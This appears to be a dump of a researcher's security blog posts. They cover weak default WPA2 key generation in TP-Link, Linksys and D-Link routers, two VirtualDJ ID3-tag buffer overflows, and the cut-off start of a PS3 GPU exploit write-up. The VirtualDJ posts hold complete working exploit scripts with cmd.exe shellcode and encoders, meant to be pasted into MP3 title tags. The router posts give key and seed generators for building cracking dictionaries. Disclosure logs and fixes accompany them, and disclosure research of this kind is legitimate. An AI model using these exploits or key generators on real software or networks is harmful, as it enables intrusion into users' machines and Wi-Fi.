--------------------------------------------------------------------------------
/posts/2013-03-08-wpa2-vulnerability-tplink/_main.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: post
3 | date: 2013-03-08
4 | title: WPA2 Key Generation Vulnerability: TP-Link
5 | author: Alexandro Sanchez
6 | ---
7 |
8 | For the past few days I have been playing with my new WLAN router, a [TP-Link TD-W8970](http://www.tp-link.com/en/products/?categoryid=203), and I have found a particularly interesting issue that affects other TP-Link routers as well. These routers can be recognized by their default ESSID, `TP-LINK_XXXXXX`. Their default keys for WPA/WPA2 and WEP are 10 and 13 characters long respectively, apparently in the range `[0-9A-Z]` and randomly generated by the [EasySetupAssistant](http://www.tp-link.com/mx/support/download/?model=TD-W8970&version=V1#tbl_b).
9 |
10 | Based on this, brute-forcing the handshake of such a WPA/WPA2 key at a typical GPU speed of 20000 keys / second would require 36^10 / 20000 seconds = 182807922003.1488 seconds = 5796.8011 years. However, by disassembling the setup assistant, I realized that this key is generated from a 32-bit seed by a [linear congruential generator](http://en.wikipedia.org/wiki/Linear_congruential_generator), which reduces our key set from 36^10 keys to 2^32 keys. The reversed generator is:
11 |
12 | ```python
13 | chars = "2345678923456789ABCDEFGHJKLMNPQRSTUVWXYZ"
14 | def gen(seed, length):  # length=10 in WPA/WPA2, length=13 in WEP
15 |     key = ""
16 |     for i in range(length):
17 |         seed = ((seed * 0x343FD) + 0x269EC3) % (2**32)  # keep the state at 32 bits
18 |         key += chars[((seed >> 0x10) & 0x7FFF) % 0x28]
19 |     return key
20 | ```
21 |
22 | Furthermore, note that for any `length` and any 32-bit integer seed `k` the following condition holds: `gen(k, length) == gen(k + 0x80000000, length)`. This reduces the number of keys to check to 2^31. At the previously mentioned computing speed, this implies finding such a key in at most 2^31 / 20000 seconds = 1.24 days.
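
The symmetry can be checked empirically. The following is a minimal Python 3 sketch that re-implements the generator with explicit 32-bit wraparound; the names `MASK32` and `CHARS` and the sample seeds are illustrative choices, not taken from the setup assistant.

```python
MASK32 = 0xFFFFFFFF
CHARS = "2345678923456789ABCDEFGHJKLMNPQRSTUVWXYZ"

def gen(seed, length=10):
    """Re-implementation of the reversed generator, truncated to 32 bits."""
    key = ""
    for _ in range(length):
        seed = (seed * 0x343FD + 0x269EC3) & MASK32
        key += CHARS[((seed >> 16) & 0x7FFF) % len(CHARS)]
    return key

# The multiplier is odd, so a difference in bit 31 of the seed stays in bit 31
# of every later state. Only bits 16..30 select a character, hence the top bit
# of the seed never influences the key.
for k in (0, 1, 0x12345678, 0x7FFFFFFF):
    twin = (k + 0x80000000) & MASK32
    assert gen(k, 10) == gen(twin, 10)
    assert gen(k, 13) == gen(twin, 13)
```

In other words, two seeds that differ only in their most significant bit always produce the same key, which is why half of the 2^32 seeds are redundant.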
23 |
24 | There is an additional issue affecting the seed generation that can help reduce the password dictionaries even more. These 32-bit seeds are not the result of a cryptographically secure [PRNG](https://en.wikipedia.org/wiki/Pseudorandom_number_generator). Instead they just represent a time difference, growing linearly at a rate of 1 every second as the system time passes. In Windows, the system time is obtained via `GetSystemTimeAsFileTime` from `Kernel32.dll`. The corresponding code to generate a seed at a given moment is:
25 |
26 | ```python
27 | import datetime
28 |
29 | def genSeed(currentTime):
30 |     dt = currentTime - datetime.datetime(1601, 1, 1, 0, 0, 0)
31 |     t = dt.days*864000000000 + dt.seconds*10000000 + dt.microseconds*10
32 |
33 |     tA = t // 2**32 + 0xFE624E21   # high 32 bits
34 |     tB = t % 2**32 + 0x2AC18000    # low 32 bits
35 |
36 |     if tB >= (1 << 32):            # carry out of the low 32 bits
37 |         tA += 1
38 |     tA, tB = tA % (1 << 32), tB % (1 << 32)
39 |
40 |     r = (tA % 0x989680) * (2**32)
41 |     r = ((r + tB) // 0x989680) % (2**32)
42 |     return r
43 |
44 | print(genSeed(datetime.datetime.utcnow()))
45 | ```
46 |
47 | If we can estimate the time interval in which the router was installed, we can reduce the total seeds from 2^31 to the seeds that could be generated in that specific time interval. For instance, if we are confident that such a router was installed during 2012, we would only have to check the keys corresponding to seeds between `0x4EFFA200` and `0x50E22700`:
48 |
49 | ```python
50 | genSeed(datetime.datetime(2012, 1, 1, 0, 0, 0)) # 0x4EFFA200
51 | genSeed(datetime.datetime(2013, 1, 1, 0, 0, 0)) # 0x50E22700
52 | ```
53 |
54 | At the previously mentioned speed, we could potentially crack the password in a worst-case time of (0x50E22700 - 0x4EFFA200) / 20000 seconds = 26.35 minutes.
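
The three time estimates in this post can be reproduced with a few lines of Python 3. This is only an arithmetic sketch: the rate of 20000 keys per second is the figure assumed in the text, a year is taken as 365 days for the first estimate, and the 2012 window is taken as 366 days of one seed per second.

```python
RATE = 20000  # keys per second, as assumed in the text

def seconds_to_search(candidates, rate=RATE):
    """Worst-case time needed to try every candidate key."""
    return candidates / rate

years = seconds_to_search(36 ** 10) / (365 * 24 * 3600)   # full [0-9A-Z] key space
days = seconds_to_search(2 ** 31) / (24 * 3600)           # all distinct seeds
minutes = seconds_to_search(366 * 24 * 3600) / 60         # one seed per second during 2012

print("36^10 keys: %.1f years" % years)
print("2^31 seeds: %.2f days" % days)
print("2012 only:  %.2f minutes" % minutes)
```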
55 |
56 | Since guessing the time in which the setup assistant configured the router can help us reduce the time required to find the key, we could improve our dictionary in the following ways:
57 |
58 | * Detect the WLAN router series and model, if possible, and compare it with a database of release dates in order to discard any seed corresponding to dates on which the router was not yet on the market.
59 | * Discard any seeds corresponding to *strange* hours. For instance, it is pretty unlikely that someone sets up their router between 2 AM and 6 AM.
60 |
61 | ## Affected routers
62 |
63 | I have checked the setup assistants distributed with TP-Link routers, and all *TL-WA*, *TL-WR*, *TL-WDR* series and *TD-WXXXX*, *TD-VGXXXX* models are affected. For about 10% of these routers I wasn't able to download the *EasySetupAssistant* through the link TP-Link provided, but I am confident that the results for other routers of the same series can be extrapolated to them.
64 |
65 | The complete list of affected routers is:
66 |
67 | * TL-W8151N (V1, V3)
68 | * TL-WA730RE (V1, V2*)
69 | * TL-WA830RE (V1, V2*)
70 | * TL-WDR3500
71 | * TL-WDR3600
72 | * TL-WDR4300
73 | * TL-WR720N
74 | * TL-WR740N (V1, V2, V3, V4)
75 | * TL-WR741ND (V1, V2, V3*, V4)
76 | * TL-WR841N (V1*, V5, V7, V8)
77 | * TL-WR841ND (V3, V5, V7, V8*)
78 | * TL-WR842ND
79 | * TL-WR940N (V1, V2)
80 | * TL-WR941ND (V2, V3, V4, V5)
81 | * TL-WR1043N
82 | * TL-WR1043ND
83 | * TD-VG3511 (V1*)
84 | * TD-VG3631
85 | * TD-W8901N
86 | * TD-W8950ND
87 | * TD-W8951NB (V3*, V4, V5)
88 | * TD-W8951ND (V1, V3, V4, V5)
89 | * TD-W8960N (V1, V3, V4)
90 | * TD-W8961NB (V1, V2, V3*)
91 | * TD-W8961ND
92 | * TD-W8968
93 | * TD-W8970
94 |
95 | ## Resources
96 |
97 | * __TPLink-CheckKeys__: Check if your key is vulnerable to this attack, i.e., find whether your key is in the set of keys generated by all possible seeds. Download: http://www.mediafire.com/?oyrnt45sljlxa5a.
98 |
99 | * __TPLink-GenSeeds__: This tool calculates the seed interval from the given time interval in which the router might have been installed. Download: http://www.mediafire.com/download.php?44l9629qq1dx2l8.
100 |
101 | * __TPLink-GenKeys__: Choose the key type and the seed range, which can be calculated with the previous tool. The tool shows information about the dictionary to be generated; accept to write it to `./output.txt`. Download: http://www.mediafire.com/download.php?28z2fvdgpf22s68.
102 |
103 | ## Solutions
104 |
105 | * Do not use seeds at all. Feed the results of a cryptographically secure PRNG, such as `/dev/random` or `/dev/urandom` in Unix-like systems, as indices of the character array modulo its length. This is, for instance, what the Linksys E4200 WLAN routers do: the indices of the key character array are provided by `CryptGenRandom` in `Advapi32.dll`.
106 | * If for some reason you want to use seeds for generating keys:
107 |     * Make them bigger than 32 bits. Just 2^32 keys are easy to check.
108 |     * Obtain them from a cryptographically secure PRNG.
109 |     * If you still want to obtain them from the system time, use fine-grained time values (e.g. elapsed time in nanoseconds rather than seconds) to minimize the number of bits an attacker can guess.
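
As an illustration of the first recommendation, here is a minimal Python 3 sketch that draws every character directly from the operating system's cryptographically secure generator through the standard `secrets` module. The alphabet and the `random_key` helper are hypothetical choices made for this example; they are not what any vendor ships.

```python
import secrets

# Assumed alphabet: digits and uppercase letters without the look-alike
# characters 0/O and 1/I (32 symbols, i.e. 5 bits per character).
ALPHABET = "23456789" + "ABCDEFGHJKLMNPQRSTUVWXYZ"

def random_key(length=10):
    """Build a key whose characters are chosen independently by the OS CSPRNG."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

print(random_key())      # 10 characters for WPA/WPA2
print(random_key(13))    # 13 characters for WEP
```

With 32 symbols, a 10-character key carries 50 bits of entropy and there is no seed for an attacker to enumerate. `secrets.choice` also avoids the slight bias that a plain modulo reduction introduces when the alphabet length does not divide the range of the random source.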
110 |
--------------------------------------------------------------------------------
/posts/2013-03-30-virtualdj-73-buffer-overflow/_main.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: post
3 | date: 2013-03-30
4 | title: VirtualDJ Pro/Home 7.3: Buffer Overflow
5 | author: Alexandro Sanchez
6 | ---
7 |
8 | I have found a buffer overflow vulnerability in [VirtualDJ Pro 7.3 and VirtualDJ Home 7.3](http://www.virtualdj.com/) and possibly previous versions of this software. When the user enters a folder, VirtualDJ retrieves the information stored in the ID3 tags of the MP3 files inside it, such as _Title_, _Album_, and _Artist_, and stores it in a buffer. After that, a second buffer of length 4096 is allocated on the stack and only the characters `[A-Z]` from the first buffer are copied to it. According to the ID3 v2.x standard, these tags can be longer than 4096 bytes; therefore it is possible to overflow this second buffer. When the overflow happens and the program reaches the `retn` instruction, the `edi` register points to the first buffer.
9 |
10 | We cannot set `eip` to the address of the first buffer directly, since that address contains bytes that are not in the range A-Z. However, if we take into account the previous information, we can do this indirectly: we write `"FSFD"` at bytes 4100:4104 of the title. After the buffer overflow occurs we get `eip == 0x44465346 == "FSFD"`. At this address (inside _urlmon.dll_) we find a `call edi` instruction, so the bytes in the first buffer will be executed. Now we face another problem: VirtualDJ has inserted a 0xC3 byte (`retn`) before each non-printable ASCII character in the first buffer, so we cannot execute the shellcode directly. We can solve this by pushing the bytes of the shellcode onto the stack using only printable ASCII characters. Let me explain:
11 |
12 | Instead of pushing the bytes 0xB8, 0xFF, 0xEF, 0xFF (FFEFFFB8h) directly, we can do exactly the same using only printable ASCII characters by using the string `"%@@@@%????-R@D@-R@D@-R@D@-R?C?P"`:
13 |
14 | ```asm
15 | and eax, 40404040h ; 25 40 40 40 40 == "%@@@@"
16 | and eax, 3F3F3F3Fh ; 25 3F 3F 3F 3F == "%????" <– eax == 0
17 | sub eax, 40444052h ; 2D 52 40 44 40 == "-R@D@"
18 | sub eax, 40444052h ; 2D 52 40 44 40 == "-R@D@"
19 | sub eax, 40444052h ; 2D 52 40 44 40 == "-R@D@"
20 | sub eax, 3F433F52h ; 2D 52 3F 43 3F == "-R?C?" <– eax == 0xFFEFFFB8
21 | push eax ; 50 == "P"
22 | ```
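
The arithmetic in this listing can be double-checked without a debugger. The Python 3 sketch below simulates the six instructions on a 32-bit register and rebuilds the byte string from the opcodes (`25` for `and eax, imm32`, `2D` for `sub eax, imm32`, `50` for `push eax`) followed by the little-endian immediates; the starting value of `eax` is arbitrary.

```python
import struct

MASK32 = 0xFFFFFFFF

eax = 0xDEADBEEF            # arbitrary initial value
eax &= 0x40404040
eax &= 0x3F3F3F3F           # the two masks share no bits, so eax is now 0
for imm in (0x40444052, 0x40444052, 0x40444052, 0x3F433F52):
    eax = (eax - imm) & MASK32   # sub eax, imm32 with 32-bit wraparound
assert eax == 0xFFEFFFB8

# Opcode byte followed by the 32-bit immediate in little-endian order
instructions = [
    (0x25, 0x40404040), (0x25, 0x3F3F3F3F),
    (0x2D, 0x40444052), (0x2D, 0x40444052),
    (0x2D, 0x40444052), (0x2D, 0x3F433F52),
]
encoded = b"".join(bytes([op]) + struct.pack("<I", imm) for op, imm in instructions)
encoded += b"\x50"          # push eax
assert encoded == b"%@@@@%????-R@D@-R@D@-R@D@-R?C?P"
```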
23 |
24 | Once all the bytes of the shellcode are pushed onto the stack (in reverse order) we use `push esp` (0x54) and `retn` (0xC3) to run the shellcode. Obviously, it does not matter if VirtualDJ inserts another 0xC3 byte before this one.
25 |
26 | This is a pretty serious vulnerability, since VirtualDJ is considered the #1 software for mixing music, with millions of downloads around the world. By exploiting this vulnerability it would be possible to spread malware quickly just by uploading a malicious MP3 file to a popular site. Even worse, antivirus software might not flag this file as suspicious. Note how the 4096 padding bytes could be replaced by something apparently harmless, such as the real title of the MP3 file followed by a lot of spaces.
27 |
28 | ```python
29 | #Exploit: VirtualDJ Pro/Home <=7.3 Buffer Overflow Vulnerability
30 | #By: Alexandro Sanchez Bach | functionmixer.blogspot.com
31 | #More info: http://www.youtube.com/watch?v=PJeaWqMJRm0
32 |
33 | import string
34 |
35 | def unicodeHex(c):
36 | c = hex(ord(c))[2:].upper()
37 | if len(c)==1: c = "0"+c
38 | return c+"00"
39 |
40 | def movEAX(s):
41 | #Arrays
42 | s = map(ord, list(s))
43 | inst = []
44 | target = [512, 512, 512, 512]
45 | carry = [0,-2,-2,-2]
46 | for i in range(4):
47 | if s[i] < 0x10:
48 | target[i] = 256
49 | if i < 3:
50 | carry[i+1] = -1
51 | diff = [target[b] - s[b] for b in range(4)]
52 |
53 | #Gen instructions
54 | for i in range(3):
55 | target = [target[b] - diff[b]/4 for b in range(4)]
56 | inst += [[diff[b]/4 for b in range(4)]]
57 | target = [target[b] - s[b] + carry[b] for b in range(4)]
58 | inst += [target]
59 |
60 | #Remove characters '[','\',']'
61 | for b in range(4):
62 | if ord("[") in [inst[i][b] for i in range(4)] or \
63 | ord("\\") in [inst[i][b] for i in range(4)] or \
64 | ord("]") in [inst[i][b] for i in range(4)]:
65 | for i in range(4):
66 | inst[i][b] = inst[i][b] + 5*((-1)**(i))
67 |
68 | inst = ["\x2D" + "".join(map(chr, i)) for i in inst]
69 | return "".join(inst)
70 |
71 | #Shellcode: Run cmd.exe
72 | shellcode = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC"
73 | shellcode += "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45"
74 | shellcode += "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45"
75 | shellcode += "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
76 | shellcode += "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3"
77 | retAddress = "\xED\x1E\x94\x7C" # JMP ESP ntdll.dll WinXP SP2
78 | shellcode += retAddress
79 |
80 | while len(shellcode) % 4 != 0:
81 | shellcode += '\x90'
82 | exploit = ""
83 | for i in range(0,len(shellcode),4)[::-1]:
84 | exploit += "\x25\x40\x40\x40\x40\x25\x3F\x3F\x3F\x3F" #EAX = 0
85 | exploit += movEAX(shellcode[i:i+4]) #EAX = shellcode[i:i+4]
86 | exploit += "\x50" #PUSH EAX
87 | exploit += '\x54\xC3' #PUSH ESP; RETN
88 |
89 | c = 0
90 | for i in exploit:
91 | if i in string.ascii_letters:
92 | c += 1
93 | exploit += "A" * (4100 - c)
94 | exploit += "FSFD"
95 |
96 | print exploit
97 | #Paste the generated code in the tag 'Title' of the MP3 file.
98 | ```
99 |
100 | You can see a demo of this proof of concept at: https://www.youtube.com/watch?v=PJeaWqMJRm0.
101 |
102 | ## Log
103 |
104 | * __2012-11-29__: Bug discovered. VirtualDJ was emailed about this a few days later.
105 | * __2013-03-20__: Bug fixed with the release of VirtualDJ Pro/Home 7.4.
106 | * __2013-03-29__: Exploit published.
107 |
--------------------------------------------------------------------------------
/posts/2013-03-31-wpa2-vulnerability-linksys-dlink/_main.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: post
3 | date: 2013-03-31
4 | title: WPA2 Key Generation Vulnerability: Linksys / D-Link
5 | author: Alexandro Sanchez
6 | ---
7 |
8 | After finding the [TP-Link WPA2 Key Generation Vulnerability](../2013-03-08-wpa2-vulnerability-tplink/), I reverse-engineered the assistants provided by other vendors. It turns out that some Linksys and D-Link routers use nearly the same algorithm as TP-Link routers to generate their default WPA2 keys. For more information about this vulnerability and its consequences, please refer to the report linked above, as redundant information will be omitted here.
9 |
10 | This time, the vulnerability affects the **Linksys EasyLink Advisor** and **D-Link Quick Setup Wizard** assistants, both based on *Network Magic*, software created by Pure Networks, a company belonging to Cisco/Linksys. Since Pure Networks actually sold their software to third parties, e.g. D-Link, other assistants might be affected as well.
11 |
12 | The reversed generator is:
13 |
14 | ```python
15 | blacklist_windows = "1I2Z0O5SUV"
16 | blacklist_macosx = "B8DO0I1S5UVZ2"
17 | blacklist = blacklist_windows # Change me
18 |
19 | def gen(seed):
20 |     key = ""
21 |     for i in range(10):
22 |         while True:
23 |             seed = ((seed * 0x343FD) + 0x269EC3) % (2**32)
24 |             edx = ((seed >> 0x10) & 0x7FFF) % 0x24
25 |             if edx >= 0xA:
26 |                 edx += 0x37
27 |             else:
28 |                 edx += 0x30
29 |             if chr(edx) not in blacklist:
30 |                 key += chr(edx)
31 |                 break
32 |     return key
33 | ```
34 |
35 | The seeds used by this function are obtained in exactly the same way as in the TP-Link assistant. The only difference this time is that, rather than pseudorandomly choosing characters from a *whitelist*, it draws pseudorandom characters in the range `[0-9A-Z]` and filters out those found in a hardcoded *blacklist*, meant to keep visually similar characters such as '`0`' and '`O`' out of the key.
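
To see what the blacklist leaves over, the following Python 3 sketch lists the effective alphabet for each of the two blacklists shown in the generator. The `allowed` helper and the `BLACKLISTS` dictionary are names introduced only for this example.

```python
import string

BASE = string.digits + string.ascii_uppercase   # the 36 characters in [0-9A-Z]
BLACKLISTS = {
    "windows": "1I2Z0O5SUV",
    "macosx": "B8DO0I1S5UVZ2",
}

def allowed(blacklist):
    """Characters that can still appear in a key after filtering."""
    return "".join(c for c in BASE if c not in blacklist)

for name, blacklist in BLACKLISTS.items():
    chars = allowed(blacklist)
    print(name, len(chars), chars)
```

The Windows blacklist leaves 26 characters and the Mac OS X one leaves 23. Even the smaller alphabet allows far more than 2^31 ten-character keys, so the number of reachable keys is still bounded by the number of seeds and not by the alphabet.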
36 |
37 | As explained in the TP-Link vulnerability report, the low entropy can be exploited to bruteforce the key in a matter of minutes with a powerful GPU or hours with a CPU.
38 |
39 |
40 | ## Affected routers
41 |
42 | The complete list of affected Linksys routers is:
43 |
44 | * WAP610N (Blacklisted characters on Windows assistant: `"1I2Z0O5SUVB8"`)
45 | * WRT110
46 | * WRT120N
47 | * WRT160N (V1, V2, V3)
48 | * WRT160N-HP (V1*)
49 | * WRT160NL
50 | * WRT310N (V1, V2)
51 | * WRT320N
52 | * WRT400N
53 | * WRT54G2
54 | * WRT610N (V1*, V2)
55 |
56 | The complete list of affected D-Link routers is:
57 |
58 | * DGL-4100
59 | * DGL-4300
60 | * DIR-615 (not all revisions)
61 | * DIR-625
62 | * DIR-635
63 | * WBR-1310
64 | * WBR-1310 Rev. B
65 | * WBR-2310
66 |
67 |
68 | ## Resources
69 |
70 | * __Linksys-CheckKeys__: Check if your key is vulnerable to this attack, i.e., find whether your key is in the set of keys generated by all possible seeds. Download: [http://www.mediafire.com/download.php?pmqt9aykwxhwkto](http://www.mediafire.com/download.php?pmqt9aykwxhwkto).
71 | * __Linksys-GenSeeds__: This tool calculates the seed interval from the given time interval in which the router might have been installed. Download: [http://www.mediafire.com/download.php?kpe7844kqd9bk4j](http://www.mediafire.com/download.php?kpe7844kqd9bk4j).
72 | * __Linksys-GenKeys__: Generate a key dictionary by specifying a seed interval. Download: [http://www.mediafire.com/download.php?2h9y0pkay9id1rt](http://www.mediafire.com/download.php?2h9y0pkay9id1rt).
73 |
74 |
75 | ## Solutions
76 |
77 | * Do not use seeds at all. Feed the results of a cryptographically secure PRNG, such as `/dev/urandom` in Unix-like systems, as indices of the character array modulo its length. This is, for instance, what the Linksys E4200 WLAN routers do: the indices of the key character array are provided by `CryptGenRandom` in `Advapi32.dll`.
78 | * If for some reason you want to use seeds for generating keys:
79 |     * Make them bigger than 32 bits. Just 2^32 keys are easy to check.
80 |     * Obtain them from a cryptographically secure PRNG.
81 |     * If you still want to obtain them from the system time, use fine-grained time values (e.g. elapsed time in nanoseconds rather than seconds) to minimize the number of bits an attacker can guess.
82 |
--------------------------------------------------------------------------------
/posts/2013-04-20-virtualdj-74-buffer-overflow/_main.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: post
3 | date: 2013-04-20
4 | title: VirtualDJ Pro/Home 7.4: Buffer Overflow
5 | author: Alexandro Sanchez
6 | ---
7 |
8 | I have found a buffer overflow vulnerability in [VirtualDJ Pro 7.4 and VirtualDJ Home 7.4](http://www.virtualdj.com/) and possibly previous versions of this software. After right-clicking a file and entering the "_File Infos_" > "_Cover..._" menu, VirtualDJ tries to find a cover for the given file on Google Images and stores the request URL in a buffer which looks like: `"http://images.google.com/images?q=X"` where `X` corresponds to the ID3 tag _Title_. Special characters of this tag are ignored, and any sequence of symbols (e.g. `' '`, `'-'`, `'_'`) is replaced with `'+'`. The problem is [once again](../2013-03-30-virtualdj-73-buffer-overflow/) that VirtualDJ does not check if the information stored in the ID3 tags is too big to fit in the buffer.
9 |
10 | To exploit this vulnerability, I searched for a `call esp` instruction stored at an address that could be represented with alphanumeric characters. I found such an instruction at 0x444D4C64, that is, `"dLMD"`. After entering this call, all the bytes after the _Fake Title_ + _Spaces_ + _Padding_ + `"dLMD"` will be executed. Since we can only use alphanumeric characters, we have to encode the shellcode and decode it at run time using only bytes in the range `[0-9A-Za-z]`. For this purpose I used a function from [ALPHA3](http://code.google.com/p/alpha3/). After that, the original shellcode will be decoded and executed.
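
The correspondence between the address and its four-character form follows from x86 storing 32-bit values in little-endian order. A short Python 3 check, where `as_text` is a helper name introduced only for this illustration:

```python
import string
import struct

ALNUM = set(string.ascii_letters + string.digits)

def as_text(address):
    """Return the four bytes of a 32-bit address as they are laid out in memory."""
    return struct.pack("<I", address).decode("ascii")

text = as_text(0x444D4C64)
print(text)
assert text == "dLMD"
assert set(text) <= ALNUM   # every byte is alphanumeric
```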
11 |
12 | ```python
13 | #Exploit: VirtualDJ Pro/Home <=7.4 Buffer Overflow Vulnerability
14 | #By: Alexandro Sanchez Bach | functionmixer.blogspot.com
15 | #More info: http://www.youtube.com/watch?v=Yini294AR2Q
16 |
17 | def encodeData(decoder, data, validValues):
18 | assert data.find("\0") == -1, "Shellcode must be NULL free"
19 | data += "\0" #End of shellcode
20 | encData = decoder[-2:]
21 | decoder = decoder[:-2]
22 | for p in range(len(data)):
23 | dByte = ord(data[p])
24 | pxByte = ord(encData[p+1])
25 | bx, by = encoder(dByte ^ pxByte, validValues)
26 | encData += chr(bx) + chr(by)
27 | return decoder + encData
28 |
29 | def encoder(value, validValues):
30 | for bx in validValues:
31 | imul = (bx * 0x30) & 0xFF
32 | for by in validValues:
33 | if imul ^ by == value: return [bx, by]
34 |
35 |
36 | #Shellcode (e.g. run cmd.exe)
37 | shellcode = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC"
38 | shellcode += "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45"
39 | shellcode += "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45"
40 | shellcode += "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
41 | shellcode += "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3"
42 | retAddress = "\xED\x1E\x94\x7C" # jmp ESP ntdll.dll WinXP SP2
43 | shellcode += retAddress
44 |
45 | #Arguments
46 | fakeTitle = "Greatest Hits of the Internet - Nyan Cat"
47 | while fakeTitle[0] == " ": fakeTitle = fakeTitle[1:]
48 | while fakeTitle[-1] == " ": fakeTitle = fakeTitle[:-1]
49 | for i in fakeTitle:
50 | if i not in "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz -":
51 | raise "Invalid characters in the fake title"
52 | fakeTitle2 = fakeTitle.replace("-"," ")
53 | while " " in fakeTitle2: fakeTitle2 = fakeTitle2.replace(" "," ")
54 |
55 | #Exploit
56 | exploit = fakeTitle + " "*1024 + "1"*(1026 - len(fakeTitle2)-1)
57 | exploit += "dLMD" #RETN address
58 | exploit += "XXAI" #ESP := Baseaddr of encoded payload
59 | exploit += encodeData(
60 | "TYhffffk4diFkDql02Dqm0D1CuEE", #Baseaddr of encoded payload := ESP
61 | shellcode,
62 | map(ord, list("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"))
63 | )
64 |
65 | print exploit
66 | #Paste the generated code in the tag 'Title' of the MP3 file.
67 | ```
68 |
69 | You can see a demo of this proof of concept at: https://www.youtube.com/watch?v=Yini294AR2Q.
70 |
71 | ## Log
72 |
73 | * __2013-04-07__: Bug discovered. VirtualDJ was emailed about this a few days later.
74 | * __2013-04-20__: Bug ignored. Exploit published.
75 |
--------------------------------------------------------------------------------
/posts/2013-04-20-virtualdj-74-buffer-overflow/index.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | VirtualDJ Pro/Home 7.4: Buffer Overflow
8 |
9 |
10 |
11 |
51 |
52 |
53 |
54 |
I have found a buffer overflow vulnerability in VirtualDJ Pro 7.4 and VirtualDJ Home 7.4 and possibly previous versions of this software. After right-clicking a file and entering the "File Infos" > "Cover..." menu, VirtualDJ tries to find a cover for the given file on Google Images and stores the request URL in a buffer which looks like: "http://images.google.com/images?q=X" where X corresponds to the ID3 tag Title. Special characters of this tag are ignored, and any sequence of symbols (e.g. ' ', '-', '_') is replaced with '+'. The problem is once again that VirtualDJ does not check if the information stored in the ID3 tags is too big to fit in the buffer.
74 |
To exploit this vulnerability, I searched for a call esp instruction stored at an address that could be represented with alphanumeric characters. I found such an instruction at 0x444D4C64, that is, "dLMD". After entering this call, all the bytes after the Fake Title + Spaces + Padding + "dLMD" will be executed. Since we can only use alphanumeric characters, we have to encode the shellcode and decode it at run time using only bytes in the range [0-9A-Za-z]. For this purpose I used a function from ALPHA3. After that, the original shellcode will be decoded and executed.
You can see a demo of this proof of concept at: https://www.youtube.com/watch?v=Yini294AR2Q.
133 |
Log
134 |
135 |
2013-04-07: Bug discovered. VirtualDJ was emailed about this a few days later.
136 |
2013-04-20: Bug ignored. Exploit published.
137 |
138 |
139 |
140 |
146 |
147 |
148 |
--------------------------------------------------------------------------------
/posts/2016-03-16-ps3-gpu-exploit/_main.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: post
3 | date: 2016-03-16
4 | title: PS3 GPU Full VRAM/IO access exploit
5 | author: Alexandro Sanchez
6 | ---
7 |
8 | ## Introduction
9 |
10 | During the early development of the PlayStation 3 emulator project [Nucleus](https://github.com/AlexAltea/nucleus), it was decided to do a high-level emulation of the PlayStation 3 kernel known as CellOS Lv-2, often shortened to *LV2*. This implied reverse engineering and reimplementing the kernel, and intercepting the syscalls used by user-mode applications. The correct reimplementation of a certain group of syscalls, the kernel-level RSX driver interface with prefix `sys_rsx`, was crucial to the success of the GPU emulation. Additionally, these syscalls are a thin wrapper of the actual hypervisor-level RSX driver, accessible through the `lv1_gpu` syscalls.
11 |
12 | Between February 2016 and March 2016, the developer *@3141card* reverse engineered the RSX driver code found in both layers. These sources, combined with the documentation and headers from the [Envytools](https://github.com/envytools/envytools)/[Nouveau](https://nouveau.freedesktop.org) projects and advice from *@mwk* eased the security analysis, resulting in the vulnerability presented here.
13 |
14 | ## Reality Synthesizer
15 |
16 | The Reality Synthesizer, commonly shortened to RSX, is the PlayStation 3 GPU and is composed of multiple engines. Gross over-simplifications take place throughout this section for the sake of readability. RSX exposes 3 Base Address Registers (BARs):
17 |
18 | | BAR | Offset | Size | Description |
19 | |--------|-----------------|---------|-------------|
20 | | *BAR0* | `0x28000000000` | 32 MB | MMIO |
21 | | *BAR1* | `0x28080000000` | 256 MB | VRAM |
22 | | *BAR2* | `0x28002000000` | *???* | RAMIN |
23 |
24 | While *BAR0* points to the MMIO register area, both *BAR1* and *BAR2* map to the same 256 MB DDR memory. The difference is that BAR2 offsets are reversed, starting from the end of the VRAM and going to the beginning in chunks of 512 KB. The following functions can be used to convert a BAR1 offset into a BAR2 offset and vice versa:
25 |
26 | ```cpp
27 | uint32_t addr_vram_to_pramin(uint32_t offset) {
28 | uint32_t vram_size = 0x10000000; // 256 MB
29 | uint32_t rev_size = 0x80000; // 512 KB
30 | return (offset - vram_size) ^ -rev_size;
31 | }
32 |
33 | uint32_t addr_ramin_to_vram(uint32_t offset) {
34 | uint32_t vram_size = 0x10000000; // 256 MB
35 | uint32_t rev_size = 0x80000; // 512 KB
36 | return vram_size - (offset - (offset % rev_size)) - rev_size + (offset % rev_size);
37 | }
38 | ```
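The chunk reversal can also be written without the XOR trick. The following is a minimal Python sketch, assuming only the 256 MB VRAM size and 512 KB chunk size stated above; the names `vram_to_ramin` and `ramin_to_vram` are illustrative and not taken from any driver. It makes explicit that the mapping is its own inverse: the chunk index is mirrored while the offset inside the chunk is preserved.

```python
VRAM_SIZE = 0x10000000  # 256 MB, as stated above
REV_SIZE = 0x80000      # 512 KB chunks, as stated above


def vram_to_ramin(offset):
    """Convert a BAR1 (VRAM) offset into a BAR2 (RAMIN) offset."""
    chunk, inner = divmod(offset, REV_SIZE)
    last_chunk = VRAM_SIZE // REV_SIZE - 1
    # Mirror the chunk index, keep the position inside the chunk.
    return (last_chunk - chunk) * REV_SIZE + inner


def ramin_to_vram(offset):
    """Convert a BAR2 (RAMIN) offset back into a BAR1 (VRAM) offset."""
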